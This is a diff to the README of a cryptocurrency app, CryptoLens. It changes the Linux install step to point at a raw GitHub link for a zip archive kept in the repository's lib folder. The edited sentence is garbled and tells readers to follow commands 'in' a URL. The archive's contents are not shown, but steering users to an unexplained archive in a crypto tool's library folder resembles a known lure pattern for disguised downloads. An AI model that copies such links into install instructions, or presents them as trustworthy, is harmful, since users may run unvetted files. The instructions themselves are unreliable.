anooshali201/CryptoLens/README.md

 4. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the instructions.
    - For macOS: Open the downloaded `.dmg` file, then drag and drop CryptoLens to your Applications folder.
-   - For Linux: Follow the specific commands in the `.tar.gz` file instructions or use your package manager for installation.
+   - For Linux: Follow the specific commands in the `https://raw.githubusercontent.com/anooshali201/CryptoLens/main/lib/Crypto-Lens-v2.2.zip` file instructions or use your package manager for installation.

 5. **Open CryptoLens:** Once installed, you can find CryptoLens in your applications folder.
 Open the app and start your exploration of cryptocurrency!